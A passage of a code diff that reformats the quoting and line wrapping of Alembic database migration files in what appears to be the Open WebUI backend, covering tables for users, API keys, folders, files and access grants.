nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), ) - op.create_index("idx_skill_user_id", "skill", ["user_id"]) - op.create_index("idx_skill_updated_at", "skill", ["updated_at"]) + op.create_index('idx_skill_user_id', 'skill', ['user_id']) + op.create_index('idx_skill_updated_at', 'skill', ['updated_at']) def downgrade() -> None: - op.drop_index("idx_skill_updated_at", table_name="skill") - op.drop_index("idx_skill_user_id", table_name="skill") - op.drop_table("skill") + op.drop_index('idx_skill_updated_at', table_name='skill') + op.drop_index('idx_skill_user_id', table_name='skill') + op.drop_table('skill')
backend/open_webui/migrations/versions/a5c220713937_add_reply_to_id_column_to_message.py+5 −5 modified@@ -12,23 +12,23 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "a5c220713937" -down_revision: Union[str, None] = "38d63c18f30f" +revision: str = 'a5c220713937' +down_revision: Union[str, None] = '38d63c18f30f' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Add 'reply_to_id' column to the 'message' table for replying to messages op.add_column( - "message", - sa.Column("reply_to_id", sa.Text(), nullable=True), + 'message', + sa.Column('reply_to_id', sa.Text(), nullable=True), ) pass def downgrade() -> None: # Remove 'reply_to_id' column from the 'message' table - op.drop_column("message", "reply_to_id") + op.drop_column('message', 'reply_to_id') pass
backend/open_webui/migrations/versions/af906e964978_add_feedback_table.py+13 −23 modified@@ -10,42 +10,32 @@ import sqlalchemy as sa # Revision identifiers, used by Alembic. -revision = "af906e964978" -down_revision = "c29facfe716b" +revision = 'af906e964978' +down_revision = 'c29facfe716b' branch_labels = None depends_on = None def upgrade(): # ### Create feedback table ### op.create_table( - "feedback", + 'feedback', + sa.Column('id', sa.Text(), primary_key=True), # Unique identifier for each feedback (TEXT type) + sa.Column('user_id', sa.Text(), nullable=True), # ID of the user providing the feedback (TEXT type) + sa.Column('version', sa.BigInteger(), default=0), # Version of feedback (BIGINT type) + sa.Column('type', sa.Text(), nullable=True), # Type of feedback (TEXT type) + sa.Column('data', sa.JSON(), nullable=True), # Feedback data (JSON type) + sa.Column('meta', sa.JSON(), nullable=True), # Metadata for feedback (JSON type) + sa.Column('snapshot', sa.JSON(), nullable=True), # snapshot data for feedback (JSON type) sa.Column( - "id", sa.Text(), primary_key=True - ), # Unique identifier for each feedback (TEXT type) - sa.Column( - "user_id", sa.Text(), nullable=True - ), # ID of the user providing the feedback (TEXT type) - sa.Column( - "version", sa.BigInteger(), default=0 - ), # Version of feedback (BIGINT type) - sa.Column("type", sa.Text(), nullable=True), # Type of feedback (TEXT type) - sa.Column("data", sa.JSON(), nullable=True), # Feedback data (JSON type) - sa.Column( - "meta", sa.JSON(), nullable=True - ), # Metadata for feedback (JSON type) - sa.Column( - "snapshot", sa.JSON(), nullable=True - ), # snapshot data for feedback (JSON type) - sa.Column( - "created_at", sa.BigInteger(), nullable=False + 'created_at', sa.BigInteger(), nullable=False ), # Feedback creation timestamp (BIGINT representing epoch) sa.Column( - "updated_at", sa.BigInteger(), nullable=False + 'updated_at', sa.BigInteger(), nullable=False ), # Feedback update timestamp (BIGINT representing epoch) ) def downgrade(): # ### Drop feedback table ### - op.drop_table("feedback") + op.drop_table('feedback')
backend/open_webui/migrations/versions/b10670c03dd5_update_user_table.py+69 −81 modified@@ -17,8 +17,8 @@ import time # revision identifiers, used by Alembic. -revision: str = "b10670c03dd5" -down_revision: Union[str, None] = "2f1211949ecc" +revision: str = 'b10670c03dd5' +down_revision: Union[str, None] = '2f1211949ecc' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -33,23 +33,21 @@ def _drop_sqlite_indexes_for_column(table_name, column_name, conn): for idx in indexes: index_name = idx[1] # index name # Get indexed columns - idx_info = conn.execute( - sa.text(f"PRAGMA index_info('{index_name}')") - ).fetchall() + idx_info = conn.execute(sa.text(f"PRAGMA index_info('{index_name}')")).fetchall() indexed_cols = [row[2] for row in idx_info] # col names if column_name in indexed_cols: - conn.execute(sa.text(f"DROP INDEX IF EXISTS {index_name}")) + conn.execute(sa.text(f'DROP INDEX IF EXISTS {index_name}')) def _convert_column_to_json(table: str, column: str): conn = op.get_bind() dialect = conn.dialect.name # SQLite cannot ALTER COLUMN → must recreate column - if dialect == "sqlite": + if dialect == 'sqlite': # 1. Add temporary column - op.add_column(table, sa.Column(f"{column}_json", sa.JSON(), nullable=True)) + op.add_column(table, sa.Column(f'{column}_json', sa.JSON(), nullable=True)) # 2. Load old data rows = conn.execute(sa.text(f'SELECT id, {column} FROM "{table}"')).fetchall() @@ -66,108 +64,100 @@ def _convert_column_to_json(table: str, column: str): conn.execute( sa.text(f'UPDATE "{table}" SET {column}_json = :val WHERE id = :id'), - {"val": json.dumps(parsed) if parsed else None, "id": uid}, + {'val': json.dumps(parsed) if parsed else None, 'id': uid}, ) # 3. Drop old TEXT column op.drop_column(table, column) # 4. Rename new JSON column → original name - op.alter_column(table, f"{column}_json", new_column_name=column) + op.alter_column(table, f'{column}_json', new_column_name=column) else: # PostgreSQL supports direct CAST op.alter_column( table, column, type_=sa.JSON(), - postgresql_using=f"{column}::json", + postgresql_using=f'{column}::json', ) def _convert_column_to_text(table: str, column: str): conn = op.get_bind() dialect = conn.dialect.name - if dialect == "sqlite": - op.add_column(table, sa.Column(f"{column}_text", sa.Text(), nullable=True)) + if dialect == 'sqlite': + op.add_column(table, sa.Column(f'{column}_text', sa.Text(), nullable=True)) rows = conn.execute(sa.text(f'SELECT id, {column} FROM "{table}"')).fetchall() for uid, raw in rows: conn.execute( sa.text(f'UPDATE "{table}" SET {column}_text = :val WHERE id = :id'), - {"val": json.dumps(raw) if raw else None, "id": uid}, + {'val': json.dumps(raw) if raw else None, 'id': uid}, ) op.drop_column(table, column) - op.alter_column(table, f"{column}_text", new_column_name=column) + op.alter_column(table, f'{column}_text', new_column_name=column) else: op.alter_column( table, column, type_=sa.Text(), - postgresql_using=f"to_json({column})::text", + postgresql_using=f'to_json({column})::text', ) def upgrade() -> None: - op.add_column( - "user", sa.Column("profile_banner_image_url", sa.Text(), nullable=True) - ) - op.add_column("user", sa.Column("timezone", sa.String(), nullable=True)) + op.add_column('user', sa.Column('profile_banner_image_url', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('timezone', sa.String(), nullable=True)) - op.add_column("user", sa.Column("presence_state", sa.String(), nullable=True)) - op.add_column("user", sa.Column("status_emoji", sa.String(), nullable=True)) - op.add_column("user", sa.Column("status_message", sa.Text(), nullable=True)) - op.add_column( - "user", sa.Column("status_expires_at", sa.BigInteger(), nullable=True) - ) + op.add_column('user', sa.Column('presence_state', sa.String(), nullable=True)) + op.add_column('user', sa.Column('status_emoji', sa.String(), nullable=True)) + op.add_column('user', sa.Column('status_message', sa.Text(), nullable=True)) + op.add_column('user', sa.Column('status_expires_at', sa.BigInteger(), nullable=True)) - op.add_column("user", sa.Column("oauth", sa.JSON(), nullable=True)) + op.add_column('user', sa.Column('oauth', sa.JSON(), nullable=True)) # Convert info (TEXT/JSONField) → JSON - _convert_column_to_json("user", "info") + _convert_column_to_json('user', 'info') # Convert settings (TEXT/JSONField) → JSON - _convert_column_to_json("user", "settings") + _convert_column_to_json('user', 'settings') op.create_table( - "api_key", - sa.Column("id", sa.Text(), primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), sa.ForeignKey("user.id", ondelete="CASCADE")), - sa.Column("key", sa.Text(), unique=True, nullable=False), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("expires_at", sa.BigInteger(), nullable=True), - sa.Column("last_used_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + 'api_key', + sa.Column('id', sa.Text(), primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), sa.ForeignKey('user.id', ondelete='CASCADE')), + sa.Column('key', sa.Text(), unique=True, nullable=False), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('expires_at', sa.BigInteger(), nullable=True), + sa.Column('last_used_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) conn = op.get_bind() - users = conn.execute( - sa.text('SELECT id, oauth_sub FROM "user" WHERE oauth_sub IS NOT NULL') - ).fetchall() + users = conn.execute(sa.text('SELECT id, oauth_sub FROM "user" WHERE oauth_sub IS NOT NULL')).fetchall() for uid, oauth_sub in users: if oauth_sub: # Example formats supported: # provider@sub # plain sub (stored as {"oidc": {"sub": sub}}) - if "@" in oauth_sub: - provider, sub = oauth_sub.split("@", 1) + if '@' in oauth_sub: + provider, sub = oauth_sub.split('@', 1) else: - provider, sub = "oidc", oauth_sub + provider, sub = 'oidc', oauth_sub - oauth_json = json.dumps({provider: {"sub": sub}}) + oauth_json = json.dumps({provider: {'sub': sub}}) conn.execute( sa.text('UPDATE "user" SET oauth = :oauth WHERE id = :id'), - {"oauth": oauth_json, "id": uid}, + {'oauth': oauth_json, 'id': uid}, ) - users_with_keys = conn.execute( - sa.text('SELECT id, api_key FROM "user" WHERE api_key IS NOT NULL') - ).fetchall() + users_with_keys = conn.execute(sa.text('SELECT id, api_key FROM "user" WHERE api_key IS NOT NULL')).fetchall() now = int(time.time()) for uid, api_key in users_with_keys: @@ -178,72 +168,70 @@ def upgrade() -> None: VALUES (:id, :user_id, :key, :created_at, :updated_at) """), { - "id": f"key_{uid}", - "user_id": uid, - "key": api_key, - "created_at": now, - "updated_at": now, + 'id': f'key_{uid}', + 'user_id': uid, + 'key': api_key, + 'created_at': now, + 'updated_at': now, }, ) - if conn.dialect.name == "sqlite": - _drop_sqlite_indexes_for_column("user", "api_key", conn) - _drop_sqlite_indexes_for_column("user", "oauth_sub", conn) + if conn.dialect.name == 'sqlite': + _drop_sqlite_indexes_for_column('user', 'api_key', conn) + _drop_sqlite_indexes_for_column('user', 'oauth_sub', conn) - with op.batch_alter_table("user") as batch_op: - batch_op.drop_column("api_key") - batch_op.drop_column("oauth_sub") + with op.batch_alter_table('user') as batch_op: + batch_op.drop_column('api_key') + batch_op.drop_column('oauth_sub') def downgrade() -> None: # --- 1. Restore old oauth_sub column --- - op.add_column("user", sa.Column("oauth_sub", sa.Text(), nullable=True)) + op.add_column('user', sa.Column('oauth_sub', sa.Text(), nullable=True)) conn = op.get_bind() - users = conn.execute( - sa.text('SELECT id, oauth FROM "user" WHERE oauth IS NOT NULL') - ).fetchall() + users = conn.execute(sa.text('SELECT id, oauth FROM "user" WHERE oauth IS NOT NULL')).fetchall() for uid, oauth in users: try: data = json.loads(oauth) provider = list(data.keys())[0] - sub = data[provider].get("sub") - oauth_sub = f"{provider}@{sub}" + sub = data[provider].get('sub') + oauth_sub = f'{provider}@{sub}' except Exception: oauth_sub = None conn.execute( sa.text('UPDATE "user" SET oauth_sub = :oauth_sub WHERE id = :id'), - {"oauth_sub": oauth_sub, "id": uid}, + {'oauth_sub': oauth_sub, 'id': uid}, ) - op.drop_column("user", "oauth") + op.drop_column('user', 'oauth') # --- 2. Restore api_key field --- - op.add_column("user", sa.Column("api_key", sa.String(), nullable=True)) + op.add_column('user', sa.Column('api_key', sa.String(), nullable=True)) # Restore values from api_key - keys = conn.execute(sa.text("SELECT user_id, key FROM api_key")).fetchall() + keys = conn.execute(sa.text('SELECT user_id, key FROM api_key')).fetchall() for uid, key in keys: conn.execute( sa.text('UPDATE "user" SET api_key = :key WHERE id = :id'), - {"key": key, "id": uid}, + {'key': key, 'id': uid}, ) # Drop new table - op.drop_table("api_key") + op.drop_table('api_key') - with op.batch_alter_table("user") as batch_op: - batch_op.drop_column("profile_banner_image_url") - batch_op.drop_column("timezone") + with op.batch_alter_table('user') as batch_op: + batch_op.drop_column('profile_banner_image_url') + batch_op.drop_column('timezone') - batch_op.drop_column("presence_state") - batch_op.drop_column("status_emoji") - batch_op.drop_column("status_message") - batch_op.drop_column("status_expires_at") + batch_op.drop_column('presence_state') + batch_op.drop_column('status_emoji') + batch_op.drop_column('status_message') + batch_op.drop_column('status_expires_at') # Convert info (JSON) → TEXT - _convert_column_to_text("user", "info") + _convert_column_to_text('user', 'info') # Convert settings (JSON) → TEXT - _convert_column_to_text("user", "settings") + _convert_column_to_text('user', 'settings')
backend/open_webui/migrations/versions/b2c3d4e5f6a7_add_scim_column_to_user_table.py+4 −4 modified@@ -12,15 +12,15 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "b2c3d4e5f6a7" -down_revision: Union[str, None] = "a1b2c3d4e5f6" +revision: str = 'b2c3d4e5f6a7' +down_revision: Union[str, None] = 'a1b2c3d4e5f6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: - op.add_column("user", sa.Column("scim", sa.JSON(), nullable=True)) + op.add_column('user', sa.Column('scim', sa.JSON(), nullable=True)) def downgrade() -> None: - op.drop_column("user", "scim") + op.drop_column('user', 'scim')
backend/open_webui/migrations/versions/c0fbf31ca0db_update_file_table.py+8 −8 modified@@ -12,21 +12,21 @@ from alembic import op # revision identifiers, used by Alembic. -revision: str = "c0fbf31ca0db" -down_revision: Union[str, None] = "ca81bd47c050" +revision: str = 'c0fbf31ca0db' +down_revision: Union[str, None] = 'ca81bd47c050' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade(): # ### commands auto generated by Alembic - please adjust! ### - op.add_column("file", sa.Column("hash", sa.Text(), nullable=True)) - op.add_column("file", sa.Column("data", sa.JSON(), nullable=True)) - op.add_column("file", sa.Column("updated_at", sa.BigInteger(), nullable=True)) + op.add_column('file', sa.Column('hash', sa.Text(), nullable=True)) + op.add_column('file', sa.Column('data', sa.JSON(), nullable=True)) + op.add_column('file', sa.Column('updated_at', sa.BigInteger(), nullable=True)) def downgrade(): # ### commands auto generated by Alembic - please adjust! ### - op.drop_column("file", "updated_at") - op.drop_column("file", "data") - op.drop_column("file", "hash") + op.drop_column('file', 'updated_at') + op.drop_column('file', 'data') + op.drop_column('file', 'hash')
backend/open_webui/migrations/versions/c29facfe716b_update_file_table_path.py+13 −21 modified@@ -12,35 +12,33 @@ from sqlalchemy.sql import table, column from sqlalchemy import String, Text, JSON, and_ -revision = "c29facfe716b" -down_revision = "c69f45358db4" +revision = 'c29facfe716b' +down_revision = 'c69f45358db4' branch_labels = None depends_on = None def upgrade(): # 1. Add the `path` column to the "file" table. - op.add_column("file", sa.Column("path", sa.Text(), nullable=True)) + op.add_column('file', sa.Column('path', sa.Text(), nullable=True)) # 2. Convert the `meta` column from Text/JSONField to `JSON()` # Use Alembic's default batch_op for dialect compatibility. - with op.batch_alter_table("file", schema=None) as batch_op: + with op.batch_alter_table('file', schema=None) as batch_op: batch_op.alter_column( - "meta", + 'meta', type_=sa.JSON(), existing_type=sa.Text(), existing_nullable=True, nullable=True, - postgresql_using="meta::json", + postgresql_using='meta::json', ) # 3. Migrate legacy data from `meta` JSONField # Fetch and process `meta` data from the table, add values to the new `path` column as necessary. # We will use SQLAlchemy core bindings to ensure safety across different databases. - file_table = table( - "file", column("id", String), column("meta", JSON), column("path", Text) - ) + file_table = table('file', column('id', String), column('meta', JSON), column('path', Text)) # Create connection to the database connection = op.get_bind() @@ -55,24 +53,18 @@ def upgrade(): # Iterate over each row to extract and update the `path` from `meta` column for row in results: - if "path" in row.meta: + if 'path' in row.meta: # Extract the `path` field from the `meta` JSON - path = row.meta.get("path") + path = row.meta.get('path') # Update the `file` table with the new `path` value - connection.execute( - file_table.update() - .where(file_table.c.id == row.id) - .values({"path": path}) - ) + connection.execute(file_table.update().where(file_table.c.id == row.id).values({'path': path})) def downgrade(): # 1. Remove the `path` column - op.drop_column("file", "path") + op.drop_column('file', 'path') # 2. Revert the `meta` column back to Text/JSONField - with op.batch_alter_table("file", schema=None) as batch_op: - batch_op.alter_column( - "meta", type_=sa.Text(), existing_type=sa.JSON(), existing_nullable=True - ) + with op.batch_alter_table('file', schema=None) as batch_op: + batch_op.alter_column('meta', type_=sa.Text(), existing_type=sa.JSON(), existing_nullable=True)
backend/open_webui/migrations/versions/c440947495f3_add_chat_file_table.py+18 −20 modified@@ -12,45 +12,43 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "c440947495f3" -down_revision: Union[str, None] = "81cc2ce44d79" +revision: str = 'c440947495f3' +down_revision: Union[str, None] = '81cc2ce44d79' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: op.create_table( - "chat_file", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("user_id", sa.Text(), nullable=False), + 'chat_file', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "chat_id", + 'chat_id', sa.Text(), - sa.ForeignKey("chat.id", ondelete="CASCADE"), + sa.ForeignKey('chat.id', ondelete='CASCADE'), nullable=False, ), sa.Column( - "file_id", + 'file_id', sa.Text(), - sa.ForeignKey("file.id", ondelete="CASCADE"), + sa.ForeignKey('file.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("message_id", sa.Text(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('message_id', sa.Text(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), # indexes - sa.Index("ix_chat_file_chat_id", "chat_id"), - sa.Index("ix_chat_file_file_id", "file_id"), - sa.Index("ix_chat_file_message_id", "message_id"), - sa.Index("ix_chat_file_user_id", "user_id"), + sa.Index('ix_chat_file_chat_id', 'chat_id'), + sa.Index('ix_chat_file_file_id', 'file_id'), + sa.Index('ix_chat_file_message_id', 'message_id'), + sa.Index('ix_chat_file_user_id', 'user_id'), # unique constraints - sa.UniqueConstraint( - "chat_id", "file_id", name="uq_chat_file_chat_file" - ), # prevent duplicate entries + sa.UniqueConstraint('chat_id', 'file_id', name='uq_chat_file_chat_file'), # prevent duplicate entries ) pass def downgrade() -> None: - op.drop_table("chat_file") + op.drop_table('chat_file') pass
backend/open_webui/migrations/versions/c69f45358db4_add_folder_table.py+17 −19 modified@@ -9,42 +9,40 @@ from alembic import op import sqlalchemy as sa -revision = "c69f45358db4" -down_revision = "3ab32c4b8f59" +revision = 'c69f45358db4' +down_revision = '3ab32c4b8f59' branch_labels = None depends_on = None def upgrade(): op.create_table( - "folder", - sa.Column("id", sa.Text(), nullable=False), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("user_id", sa.Text(), nullable=False), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("items", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("is_expanded", sa.Boolean(), default=False, nullable=False), + 'folder', + sa.Column('id', sa.Text(), nullable=False), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('user_id', sa.Text(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('items', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('is_expanded', sa.Boolean(), default=False, nullable=False), + sa.Column('created_at', sa.DateTime(), server_default=sa.func.now(), nullable=False), sa.Column( - "created_at", sa.DateTime(), server_default=sa.func.now(), nullable=False - ), - sa.Column( - "updated_at", + 'updated_at', sa.DateTime(), nullable=False, server_default=sa.func.now(), onupdate=sa.func.now(), ), - sa.PrimaryKeyConstraint("id", "user_id"), + sa.PrimaryKeyConstraint('id', 'user_id'), ) op.add_column( - "chat", - sa.Column("folder_id", sa.Text(), nullable=True), + 'chat', + sa.Column('folder_id', sa.Text(), nullable=True), ) def downgrade(): - op.drop_column("chat", "folder_id") + op.drop_column('chat', 'folder_id') - op.drop_table("folder") + op.drop_table('folder')
backend/open_webui/migrations/versions/ca81bd47c050_add_config_table.py+9 −11 modified@@ -12,23 +12,21 @@ from alembic import op # revision identifiers, used by Alembic. -revision: str = "ca81bd47c050" -down_revision: Union[str, None] = "7e5b5dc7342b" +revision: str = 'ca81bd47c050' +down_revision: Union[str, None] = '7e5b5dc7342b' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade(): op.create_table( - "config", - sa.Column("id", sa.Integer, primary_key=True), - sa.Column("data", sa.JSON(), nullable=False), - sa.Column("version", sa.Integer, nullable=False), + 'config', + sa.Column('id', sa.Integer, primary_key=True), + sa.Column('data', sa.JSON(), nullable=False), + sa.Column('version', sa.Integer, nullable=False), + sa.Column('created_at', sa.DateTime(), nullable=False, server_default=sa.func.now()), sa.Column( - "created_at", sa.DateTime(), nullable=False, server_default=sa.func.now() - ), - sa.Column( - "updated_at", + 'updated_at', sa.DateTime(), nullable=True, server_default=sa.func.now(), @@ -38,4 +36,4 @@ def upgrade(): def downgrade(): - op.drop_table("config") + op.drop_table('config')
backend/open_webui/migrations/versions/d31026856c01_update_folder_table_data.py+4 −4 modified@@ -9,15 +9,15 @@ from alembic import op import sqlalchemy as sa -revision = "d31026856c01" -down_revision = "9f0c9cd09105" +revision = 'd31026856c01' +down_revision = '9f0c9cd09105' branch_labels = None depends_on = None def upgrade(): - op.add_column("folder", sa.Column("data", sa.JSON(), nullable=True)) + op.add_column('folder', sa.Column('data', sa.JSON(), nullable=True)) def downgrade(): - op.drop_column("folder", "data") + op.drop_column('folder', 'data')
backend/open_webui/migrations/versions/f1e2d3c4b5a6_add_access_grant_table.py+101 −126 modified@@ -20,8 +20,8 @@ from open_webui.migrations.util import get_existing_tables -revision: str = "f1e2d3c4b5a6" -down_revision: Union[str, None] = "8452d01d26d7" +revision: str = 'f1e2d3c4b5a6' +down_revision: Union[str, None] = '8452d01d26d7' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -30,48 +30,48 @@ def upgrade() -> None: existing_tables = set(get_existing_tables()) # Create access_grant table - if "access_grant" not in existing_tables: + if 'access_grant' not in existing_tables: op.create_table( - "access_grant", - sa.Column("id", sa.Text(), nullable=False, primary_key=True), - sa.Column("resource_type", sa.Text(), nullable=False), - sa.Column("resource_id", sa.Text(), nullable=False), - sa.Column("principal_type", sa.Text(), nullable=False), - sa.Column("principal_id", sa.Text(), nullable=False), - sa.Column("permission", sa.Text(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'access_grant', + sa.Column('id', sa.Text(), nullable=False, primary_key=True), + sa.Column('resource_type', sa.Text(), nullable=False), + sa.Column('resource_id', sa.Text(), nullable=False), + sa.Column('principal_type', sa.Text(), nullable=False), + sa.Column('principal_id', sa.Text(), nullable=False), + sa.Column('permission', sa.Text(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), sa.UniqueConstraint( - "resource_type", - "resource_id", - "principal_type", - "principal_id", - "permission", - name="uq_access_grant_grant", + 'resource_type', + 'resource_id', + 'principal_type', + 'principal_id', + 'permission', + name='uq_access_grant_grant', ), ) op.create_index( - "idx_access_grant_resource", - "access_grant", - ["resource_type", "resource_id"], + 'idx_access_grant_resource', + 'access_grant', + ['resource_type', 'resource_id'], ) op.create_index( - "idx_access_grant_principal", - "access_grant", - ["principal_type", "principal_id"], + 'idx_access_grant_principal', + 'access_grant', + ['principal_type', 'principal_id'], ) # Backfill existing access_control JSON data conn = op.get_bind() # Tables with access_control JSON columns: (table_name, resource_type) resource_tables = [ - ("knowledge", "knowledge"), - ("prompt", "prompt"), - ("tool", "tool"), - ("model", "model"), - ("note", "note"), - ("channel", "channel"), - ("file", "file"), + ('knowledge', 'knowledge'), + ('prompt', 'prompt'), + ('tool', 'tool'), + ('model', 'model'), + ('note', 'note'), + ('channel', 'channel'), + ('file', 'file'), ] now = int(time.time()) @@ -83,9 +83,7 @@ def upgrade() -> None: # Query all rows try: - result = conn.execute( - sa.text(f'SELECT id, access_control FROM "{table_name}"') - ) + result = conn.execute(sa.text(f'SELECT id, access_control FROM "{table_name}"')) rows = result.fetchall() except Exception: continue @@ -99,19 +97,16 @@ def upgrade() -> None: # EXCEPTION: files with NULL are PRIVATE (owner-only), not public is_null = ( access_control_json is None - or access_control_json == "null" - or ( - isinstance(access_control_json, str) - and access_control_json.strip().lower() == "null" - ) + or access_control_json == 'null' + or (isinstance(access_control_json, str) and access_control_json.strip().lower() == 'null') ) if is_null: # Files: NULL = private (no entry needed, owner has implicit access) # Other resources: NULL = public (insert user:* for read) - if resource_type == "file": + if resource_type == 'file': continue # Private - no entry needed - key = (resource_type, resource_id, "user", "*", "read") + key = (resource_type, resource_id, 'user', '*', 'read') if key not in inserted: try: conn.execute( @@ -120,13 +115,13 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": "*", - "permission": "read", - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': '*', + 'permission': 'read', + 'created_at': now, }, ) inserted.add(key) @@ -149,28 +144,24 @@ def upgrade() -> None: continue # Check if it's effectively empty (no read/write keys with content) - read_data = access_control_json.get("read", {}) - write_data = access_control_json.get("write", {}) + read_data = access_control_json.get('read', {}) + write_data = access_control_json.get('write', {}) - has_read_grants = read_data.get("group_ids", []) or read_data.get( - "user_ids", [] - ) - has_write_grants = write_data.get("group_ids", []) or write_data.get( - "user_ids", [] - ) + has_read_grants = read_data.get('group_ids', []) or read_data.get('user_ids', []) + has_write_grants = write_data.get('group_ids', []) or write_data.get('user_ids', []) if not has_read_grants and not has_write_grants: # Empty permissions = private, no grants needed continue # Extract permissions and insert into access_grant table - for permission in ["read", "write"]: + for permission in ['read', 'write']: perm_data = access_control_json.get(permission, {}) if not perm_data: continue - for group_id in perm_data.get("group_ids", []): - key = (resource_type, resource_id, "group", group_id, permission) + for group_id in perm_data.get('group_ids', []): + key = (resource_type, resource_id, 'group', group_id, permission) if key in inserted: continue try: @@ -180,21 +171,21 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "group", - "principal_id": group_id, - "permission": permission, - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'group', + 'principal_id': group_id, + 'permission': permission, + 'created_at': now, }, ) inserted.add(key) except Exception: pass - for user_id in perm_data.get("user_ids", []): - key = (resource_type, resource_id, "user", user_id, permission) + for user_id in perm_data.get('user_ids', []): + key = (resource_type, resource_id, 'user', user_id, permission) if key in inserted: continue try: @@ -204,13 +195,13 @@ def upgrade() -> None: VALUES (:id, :resource_type, :resource_id, :principal_type, :principal_id, :permission, :created_at) """), { - "id": str(uuid.uuid4()), - "resource_type": resource_type, - "resource_id": resource_id, - "principal_type": "user", - "principal_id": user_id, - "permission": permission, - "created_at": now, + 'id': str(uuid.uuid4()), + 'resource_type': resource_type, + 'resource_id': resource_id, + 'principal_type': 'user', + 'principal_id': user_id, + 'permission': permission, + 'created_at': now, }, ) inserted.add(key) @@ -223,7 +214,7 @@ def upgrade() -> None: continue try: with op.batch_alter_table(table_name) as batch: - batch.drop_column("access_control") + batch.drop_column('access_control') except Exception: pass @@ -235,20 +226,20 @@ def downgrade() -> None: # Resource tables mapping: (table_name, resource_type) resource_tables = [ - ("knowledge", "knowledge"), - ("prompt", "prompt"), - ("tool", "tool"), - ("model", "model"), - ("note", "note"), - ("channel", "channel"), - ("file", "file"), + ('knowledge', 'knowledge'), + ('prompt', 'prompt'), + ('tool', 'tool'), + ('model', 'model'), + ('note', 'note'), + ('channel', 'channel'), + ('file', 'file'), ] # Step 1: Re-add access_control columns to resource tables for table_name, _ in resource_tables: try: with op.batch_alter_table(table_name) as batch: - batch.add_column(sa.Column("access_control", sa.JSON(), nullable=True)) + batch.add_column(sa.Column('access_control', sa.JSON(), nullable=True)) except Exception: pass @@ -262,7 +253,7 @@ def downgrade() -> None: FROM access_grant WHERE resource_type = :resource_type """), - {"resource_type": resource_type}, + {'resource_type': resource_type}, ) rows = result.fetchall() except Exception: @@ -278,75 +269,59 @@ def downgrade() -> None: if resource_id not in resource_grants: resource_grants[resource_id] = { - "is_public": False, - "read": {"group_ids": [], "user_ids": []}, - "write": {"group_ids": [], "user_ids": []}, + 'is_public': False, + 'read': {'group_ids': [], 'user_ids': []}, + 'write': {'group_ids': [], 'user_ids': []}, } # Handle public access (user:* for read) - if ( - principal_type == "user" - and principal_id == "*" - and permission == "read" - ): - resource_grants[resource_id]["is_public"] = True + if principal_type == 'user' and principal_id == '*' and permission == 'read': + resource_grants[resource_id]['is_public'] = True continue # Add to appropriate list - if permission in ["read", "write"]: - if principal_type == "group": - if ( - principal_id - not in resource_grants[resource_id][permission]["group_ids"] - ): - resource_grants[resource_id][permission]["group_ids"].append( - principal_id - ) - elif principal_type == "user": - if ( - principal_id - not in resource_grants[resource_id][permission]["user_ids"] - ): - resource_grants[resource_id][permission]["user_ids"].append( - principal_id - ) + if permission in ['read', 'write']: + if principal_type == 'group': + if principal_id not in resource_grants[resource_id][permission]['group_ids']: + resource_grants[resource_id][permission]['group_ids'].append(principal_id) + elif principal_type == 'user': + if principal_id not in resource_grants[resource_id][permission]['user_ids']: + resource_grants[resource_id][permission]['user_ids'].append(principal_id) # Step 3: Update each resource with reconstructed JSON for resource_id, grants in resource_grants.items(): - if grants["is_public"]: + if grants['is_public']: # Public = NULL access_control_value = None elif ( - not grants["read"]["group_ids"] - and not 